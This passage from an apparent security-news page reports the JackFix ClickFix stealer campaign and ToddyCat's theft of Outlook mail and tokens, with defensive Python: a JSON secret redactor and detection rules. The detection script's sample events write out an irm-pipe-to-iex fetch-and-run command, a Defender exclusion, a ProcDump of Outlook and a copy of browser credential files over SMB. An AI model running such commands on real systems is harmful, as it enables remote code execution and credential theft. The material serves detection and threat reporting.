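        parts = [scan(val, f"{path}[{i}]") for i, val in enumerate(obj)]
        return [p for p, _ in parts], [h for _, hs in parts for h in hs]
    if isinstance(obj, str):
        hits = [(path, f"value matches {name}")
                for name, pat in VALUE_PATTERNS.items() if pat.search(obj)]
        return (REDACTED if hits else obj), hits
    return obj, []  # numbers, booleans, null carry nothing to redact

def format_json_safely(text: str) -> tuple[str, list[tuple[str, str]]]:
    """Local replacement for a paste-and-share formatter: secrets never leave."""
    clean, hits = scan(json.loads(text))
    return json.dumps(clean, indent=2, sort_keys=True), hits

# Constructed sample config; the AWS key is Amazon's documented example value.
SAMPLE = """{
  "service": "billing-api",
  "db": {"host": "db01.corp.example", "user": "svc_billing", "password": "Winter2025!"},
  "aws": {"access_key_id": "AKIAIOSFODNN7EXAMPLE", "region": "eu-west-1"},
  "webhook": "https://deploy:hunter2@ci.corp.example/hook"
}"""
```

    Running `format_json_safely(SAMPLE)` returns the formatted document with three values replaced and a findings list naming the JSON path and the reason for each.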


    Source: thehackernews.com…

  • JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers

    Cybersecurity researchers are calling attention to a new campaign that’s leveraging a combination of ClickFix lures and fake adult websites to deceive users into running malicious commands under the guise of a “critical” Windows security update.

    “Campaign leverages fake adult websites (xHamster, PornHub clones) as its phishing mechanism, likely distributed via malvertising,” Acronis said in a new report shared with The Hacker News. “The adult theme, and possible connection to shady websites, adds to the victim’s psychological pressure to comply with sudden ‘security update’ installation.”

    ClickFix-style attacks have surged over the past year, typically tricking users into running malicious commands on their own machines using prompts for technical fixes or completing CAPTCHA verification checks. According to data from Microsoft, ClickFix has become the most common initial access method, accounting for 47% of attacks.

    The latest campaign displays highly convincing fake Windows update screens in an attempt to get the victim to run malicious code, indicating that attackers are moving away from the traditional robot-check lures. The activity has been codenamed JackFix by the Singapore-based cybersecurity company.

    Perhaps the most concerning aspect of the attack is that the phony Windows update alert hijacks the entire screen and instructs the victim to open the Windows Run dialog, press Ctrl + V, and hit Enter, thereby triggering the infection sequence.


    It’s assessed that the starting point of the attack is a fake adult site to which unsuspecting users are redirected via malvertising or other social engineering methods, only to suddenly serve them an “urgent security update.” Select iterations of the sites have been found to include developer comments in Russian, hinting at the possibility of a Russian-speaking threat actor.

    “The Windows Update screen is created entirely using HTML and JavaScript code, and pops up as soon as the victim interacts with any element on the phishing site,” security researcher Eliad Kimhy said. “The page attempts to go full screen via JavaScript code, while at the same time creating a fairly convincing Windows Update window composed of a blue background and white text, reminiscent of Windows’ infamous blue screen of death.”

    What’s notable about the attack is that it heavily leans on obfuscation to conceal ClickFix-related code, as well as blocks users from escaping the full-screen alert by disabling the Escape and F11 buttons, along with F5 and F12 keys. However, due to faulty logic, users can still press the Escape and F11 buttons to get rid of the full screen.

    The initial command executed is an MSHTA payload launched using the legitimate mshta.exe binary, which, in turn, contains JavaScript designed to run a PowerShell command that retrieves another PowerShell script from a remote server. The hosting domains are set up such that navigating to them directly in a browser redirects the user to a benign site like Google or Steam.

    “Only when the site is reached out to via an irm or iwr PowerShell command does it respond with the correct code,” Acronis explained. “This creates an extra layer of obfuscation and analysis prevention.”

    The downloaded PowerShell script also packs in various obfuscation and anti-analysis mechanisms, one of which is the use of garbage code to complicate analysis efforts. It also attempts to elevate privileges and creates Microsoft Defender Antivirus exclusions for command-and-control (C2) addresses and paths where the payloads are staged.

    To achieve privilege escalation, the malware uses the Start-Process cmdlet in conjunction with the “-Verb RunAs” parameter to launch PowerShell with administrative rights and continuously prompts for permission until it’s granted by the victim. Once this step is successful, the script is designed to drop additional payloads, such as simple remote access trojans (RATs) that are programmed to contact a C2 server, presumably to drop more malware.

    The PowerShell script has also been observed to serve up to eight different payloads, with Acronis describing it as the “most egregious example of spray and pray.” These include Rhadamanthys Stealer, Vidar Stealer 2.0, RedLine Stealer, Amadey, as well as other unspecified loaders and RATs.

    “If only one of these payloads manages to run successfully, victims risk losing passwords, crypto wallets, and more,” Kimhy said. “In the case of a few of these loaders — the attacker may choose to bring in other payloads into the attack, and the attack can quickly escalate further.”


    The disclosure comes as Huntress detailed a multi-stage malware execution chain that originates from a ClickFix lure masquerading as a Windows update and deploys stealer malware like Lumma and Rhadamanthys by concealing the final stages within an image, a technique known as steganography.

    Like in the case of the aforementioned campaign, the ClickFix command copied to the clipboard and pasted into the Run dialog uses mshta.exe to run a JavaScript payload that’s capable of running a remotely-hosted PowerShell script directly in memory.

    The PowerShell code is used to decrypt and launch a .NET assembly payload, a loader dubbed Stego Loader that serves as a conduit for the execution of Donut-packed shellcode hidden within an embedded and encrypted PNG file. The extracted shellcode is then injected into a target process to ultimately deploy Lumma or Rhadamanthys.

    Interestingly, one of the domains listed by Huntress as being used to fetch the PowerShell script (“securitysettings[.]live”) has also been flagged by Acronis, suggesting these two activity clusters may be related.

    “The threat actor often changes the URI (/tick.odd, /gpsc.dat, /ercx.dat, etc.) used to host the first mshta.exe stage,” security researchers Ben Folland and Anna Pham said in the report.

    “Additionally, the threat actor moved from hosting the second stage on the domain securitysettings[.]live and instead hosted on xoiiasdpsdoasdpojas[.]com, although both point to the same IP address 141.98.80[.]175, which was also used to deliver the first stage [i.e., the JavaScript code run by mshta.exe].”

    ClickFix has become hugely successful as it relies on a simple yet effective method, which is to entice a user into infecting their own machine and bypassing security controls. Organizations can defend against such attacks by training employees to better spot the threat and disabling the Windows Run box via Registry changes or Group Policy.


    Source: thehackernews.com…

  • ToddyCat’s New Hacking Tools Steal Outlook Emails and Microsoft 365 Access Tokens

    Nov 25, 2025 | Ravie Lakshmanan | Malware / Vulnerability

    The threat actor known as ToddyCat has been observed adopting new methods to obtain access to corporate email data belonging to target companies, including using a custom tool dubbed TCSectorCopy.

    “This attack allows them to obtain tokens for the OAuth 2.0 authorization protocol using the user’s browser, which can be used outside the perimeter of the compromised infrastructure to access corporate mail,” Kaspersky said in a technical breakdown.

    ToddyCat, assessed to be active since 2020, has a track record of targeting organizations in Europe and Asia with a range of tools, including Samurai and TomBerBil, to retain access and steal cookies and credentials from web browsers like Google Chrome and Microsoft Edge.


    Earlier this April, the exploitation of a security flaw in ESET Command Line Scanner (CVE-2024-11859, CVSS score: 6.8) to deliver a previously undocumented malware codenamed TCESB was attributed to the hacking group.

    Kaspersky said it detected a PowerShell variant of TomBerBil (as opposed to C++ and C# versions flagged before) in attacks that took place between May and June 2024, which comes with capabilities to extract data from Mozilla Firefox. A notable feature of this version is that it runs on domain controllers from a privileged user and can access browser files via shared network resources using the SMB protocol.

    The malware, the company added, was launched by means of a scheduled task that executed a PowerShell command. Specifically, it searches for browser history, cookies, and saved credentials in the remote host over SMB. While the copied files containing the information are encrypted using the Windows Data Protection API (DPAPI), TomBerBil is equipped to capture the encryption key necessary to decrypt the data.

    “The previous version of TomBerBil ran on the host and copied the user token. As a result, DPAPI was used to decrypt the master key in the user’s current session, and subsequently the files themselves,” researchers said. “In the newer server version, TomBerBil copies files containing user encryption keys that are used by DPAPI. Using these keys, as well as the user’s SID and password, attackers can decrypt all copied files locally.”

    The threat actors have also been found to access corporate emails stored in local Microsoft Outlook storage in the form of OST (short for Offline Storage Table) files using TCSectorCopy (“xCopy.exe”), bypassing restrictions that limit access to such files when the application is running.

    Written in C++, TCSectorCopy accepts as input a file to be copied (in this case, OST files) and then proceeds to open the disk as a read-only device and sequentially copy the file contents sector by sector. Once the OST files are written to a path of the attacker’s choosing, the contents of the electronic correspondence are extracted using XstReader, an open-source viewer for Outlook OST and PST files.


    Another tactic adopted by ToddyCat involves efforts to obtain access tokens directly from memory in cases where victim organizations used the Microsoft 365 cloud service. The JSON web tokens (JWTs) are obtained through an open-source C# tool named SharpTokenFinder, which enumerates Microsoft 365 applications for plain text authentication tokens.

    But the threat actor is said to have faced a setback in at least one investigated incident after security software installed on the system blocked SharpTokenFinder’s attempt to dump the Outlook.exe process. To get around this restriction, the operator used the ProcDump tool from the Sysinternals package with specific arguments to take a memory dump of the Outlook process.

    “The ToddyCat APT group is constantly developing its techniques and looking for those that would hide activity to gain access to corporate correspondence within the compromised infrastructure,” Kaspersky said.
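    Added example, not Acronis’ or Kaspersky’s code, serving both the JackFix chain described above (Run dialog, mshta.exe, irm/iwr download, Start-Process -Verb RunAs, Defender exclusions) and the ToddyCat tradecraft in this article (ProcDump of Outlook.exe, browser credential files read over SMB): triage rules run over constructed process-creation events. The Add-MpPreference cmdlet for the exclusions, the browser file names, the host names and the placeholder domain are assumptions; the URI and ProcDump usage come from the reports.

```python
import re
from collections import namedtuple

# Added example (not Acronis' or Kaspersky's code): triage rules over
# process-creation events for behaviours described in both write-ups.
ProcEvent = namedtuple("ProcEvent", "host parent image cmdline")
PS = {"powershell.exe", "pwsh.exe"}

def _base(path): return path.rsplit("\\", 1)[-1].lower()

RULES = [
    # JackFix: Run dialog (hosted by explorer.exe) starting mshta with a URL.
    ("mshta.exe launched from Run dialog with remote URL", lambda e:
     _base(e.image) == "mshta.exe" and _base(e.parent) == "explorer.exe"
     and re.search(r"https?://", e.cmdline, re.I)),
    # JackFix: mshta-hosted JavaScript spawning a PowerShell irm/iwr downloader.
    ("PowerShell downloader spawned by mshta.exe", lambda e:
     _base(e.parent) == "mshta.exe" and _base(e.image) in PS and re.search(
         r"\b(irm|iwr|invoke-restmethod|invoke-webrequest)\b", e.cmdline, re.I)),
    # JackFix: self-elevation loop with Start-Process -Verb RunAs.
    ("PowerShell self-elevation via -Verb RunAs", lambda e:
     _base(e.image) in PS and re.search(r"start-process.*-verb\s+runas", e.cmdline, re.I)),
    # JackFix: Defender exclusions (assumed to be set with Add-MpPreference).
    ("Defender exclusion added from PowerShell", lambda e:
     _base(e.image) in PS and re.search(
         r"add-mppreference\s+-exclusion(path|process|extension)", e.cmdline, re.I)),
    # ToddyCat: ProcDump used on Outlook.exe after SharpTokenFinder was blocked.
    ("ProcDump memory dump of Outlook.exe", lambda e:
     _base(e.image).startswith("procdump") and "outlook" in e.cmdline.lower()),
    # ToddyCat: PowerShell on a DC reading browser credential stores over SMB shares.
    ("Browser credential store read over SMB admin share", lambda e:
     _base(e.image) in PS and re.search(
         r"\\\\[^\\\s]+\\[a-z]\$\\.*(login data|cookies|logins\.json)", e.cmdline, re.I)),
]

def triage(events):
    """Return (host, rule name, image) for every event that matches a rule."""
    return [(e.host, name, _base(e.image))
            for e in events for name, match in RULES if match(e)]

def hosts_with_chain(events, min_rules=2):
    """Hosts where several distinct rules fired: a chain, not one odd command."""
    seen = {}
    for host, name, _ in triage(events):
        seen.setdefault(host, set()).add(name)
    return sorted(h for h, names in seen.items() if len(names) >= min_rules)

# Constructed sample events; the domain is a placeholder, the URI is from the report.
EXP, MSHTA = r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe"
PSH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent("ws01", EXP, MSHTA, "mshta https://update-placeholder.invalid/tick.odd"),
    ProcEvent("ws01", MSHTA, PSH, 'powershell -w hidden -c "irm https://update-placeholder.invalid/s | iex"'),
    ProcEvent("ws01", PSH, PSH, "powershell -c Start-Process powershell -Verb RunAs"),
    ProcEvent("ws01", PSH, PSH, r"powershell Add-MpPreference -ExclusionPath C:\Users\Public"),
    ProcEvent("ws01", r"C:\Windows\System32\cmd.exe", r"C:\tools\procdump64.exe", r"procdump64.exe -ma Outlook.exe C:\tmp\o.dmp"),
    ProcEvent("dc01", r"C:\Windows\System32\svchost.exe", PSH, r"powershell Copy-Item '\\ws07\C$\Users\j.doe\AppData\Local\Google\Chrome\User Data\Default\Login Data' C:\tmp"),
    ProcEvent("ws01", EXP, r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE", "OUTLOOK.EXE"),  # benign
]
```

    `hosts_with_chain` is the signal worth paging on: a single Defender exclusion may be an administrator, but several of these rules on one host within a short window is the self-infection sequence the articles describe.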


    Source: thehackernews.com…